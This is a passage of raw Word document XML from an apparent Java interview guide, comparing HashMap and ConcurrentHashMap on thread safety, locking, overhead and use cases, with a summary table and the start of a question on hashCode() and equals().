          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure thread-safety in multi-threaded environments. While this provides excellent performance under concurrent access, the internal locking and atomics add overhead to operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AF1A10" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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Simpler Data Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55878BE3" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88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relies on a simple underlying array with a linked list (or a red-black tree, depending on the load factor) to store entries. It only focuses on managing the data structure, without worrying about concurrent modifications or consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0E6685" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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 the other hand:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7FDB19" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89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tHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> has more complex internals. It divides the map into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>segments</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buckets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and uses fine-grained locks or CAS (Compare-And-Swap) for atomic operations. This complexity ensures thread-safety and concurrent access but requires additional checks and logic for every operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470545AB" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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Concurrency Overhead in ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304E8711" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is specifically designed for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-threaded</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> scenarios. It uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bucket-level locking</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segment locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to allow multiple threads to operate on different parts of the map concurrently. This means that when a thread accesses one part of the map, it locks only that part, allowing other threads to access different parts without waiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA057C3" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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owever, when you perform an operation (like put(), get(), or remove()) on a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, there is still some inherent overhead from managing the concurrency control mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5553C3B5" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0987D7DD" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89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perations like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>putIfAbsen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computeIfAbsent()</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replace()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are atomic and involve more complex internal logic to ensure thread safety. These operations require synchronization mechanisms, such as CAS, which adds overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B70FC59" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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Locking Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788DAB9C" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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does not have locks or any synchronization mechanism, making its operations faster in the absence of multi-threading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFD723C" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> employs internal locking mechanisms (like bucket locks or locks on segments) to allow multiple threads to read and write concurrently. While this is efficient in multi-threaded environments, it adds overhead when compared to the simpler HashMap in a single-threaded context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F145DA9" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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Thread-Safety Tradeoff:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B59EB98" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89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Safety</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> comes at a cost. In ConcurrentHashMap, operations are designed to be safe in a multi-threaded environment. For example, the method putIfAbsent() checks if a key is already mapped and only puts a new entry if the key is absent. This requires </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>atomic operations</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locks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, adding some performance overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AFFFD6" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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contrast:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F67183" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89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does not deal with such concerns and simply puts the value in the bucket corresponding to the key, without checking whether the key already exists, so it's faster when no synchronization is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366D6DFB" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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Use Case and Context:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F21034A" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89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 single-threaded environments</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will always be faster because it doesn't deal with the overhead of managing concurrent access or maintaining thread safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5087DDD6" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89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 multi-threaded environments</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ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> performs better as it ensures thread safety and provides better concurrency. While it might be slower in single-threaded environments, its design optimizes it for concurrent read and write operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07563E2D" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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 of 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6"/>
        <w:gridCol w:w="3130"/>
        <w:gridCol w:w="5188"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DA3149" w:rsidRPr="00CE4B95" w14:paraId="7268DE92" w14:textId="77777777" w:rsidTr="00D32F5E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="129BF940" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="0012627E">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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04B5C8DF" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="0012627E">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ashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CE7C477" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="0012627E">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urrentHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA3149" w:rsidRPr="00CE4B95" w14:paraId="256C4809" w14:textId="77777777" w:rsidTr="00D32F5E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C2F82F9" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05C04EB8" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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t thread-safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D98AE87" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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read-safe, supports concurrent access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA3149" w:rsidRPr="00CE4B95" w14:paraId="413E672F" w14:textId="77777777" w:rsidTr="00D32F5E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="461456B0" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="154E7A7A" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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aster in single-threaded context</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EBD5A4E" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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lower in single-threaded due to concurrency mechanisms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA3149" w:rsidRPr="00CE4B95" w14:paraId="2268C072" w14:textId="77777777" w:rsidTr="00D32F5E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="120951DD" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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ternal Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A965252" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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mple array with linked list or tree</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43E0CEC2" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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ne-grained locking or segment locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA3149" w:rsidRPr="00CE4B95" w14:paraId="42F481AD" w14:textId="77777777" w:rsidTr="00D32F5E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27AB9255" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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cking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C199434" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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locking (no synchronization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C577A1C" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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ucket-level or segment-level locking, atomic operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA3149" w:rsidRPr="00CE4B95" w14:paraId="7BE507FD" w14:textId="77777777" w:rsidTr="00D32F5E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="391FAD47" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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ase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F47580F" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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gle-threaded environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F09F411" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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ulti-threaded environments with high concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C70709F" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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209D330B" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89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is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>faster</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> than </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in single-threaded scenarios because it doesn't involve synchronization overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BBF813" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="897"/>
        </w:numPr>
        <w:jc w:val="both"/>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">However, in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-threaded</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> context, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>better</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it handles concurrency more efficiently by allowing threads to access different parts of the map concurrently without causing data corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681FEAB7" w14:textId="1E2CF1F4"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9AAF2AF">
          <v:rect id="_x0000_i1588" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C08C20D" w14:textId="68D0C0E5" w:rsidR="00B967F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B967F0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="195" w:name="_Toc196307675"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Suppose I have multiple Employee objects with different names, so how does HashMap differentiate between different objects?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="195"/>
    </w:p>
    <w:p w14:paraId="0BF7417F" w14:textId="58376DE5" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">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differentiates between different objects using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashCode()</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equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods.</w:t>
      </w:r>
    </w:p>
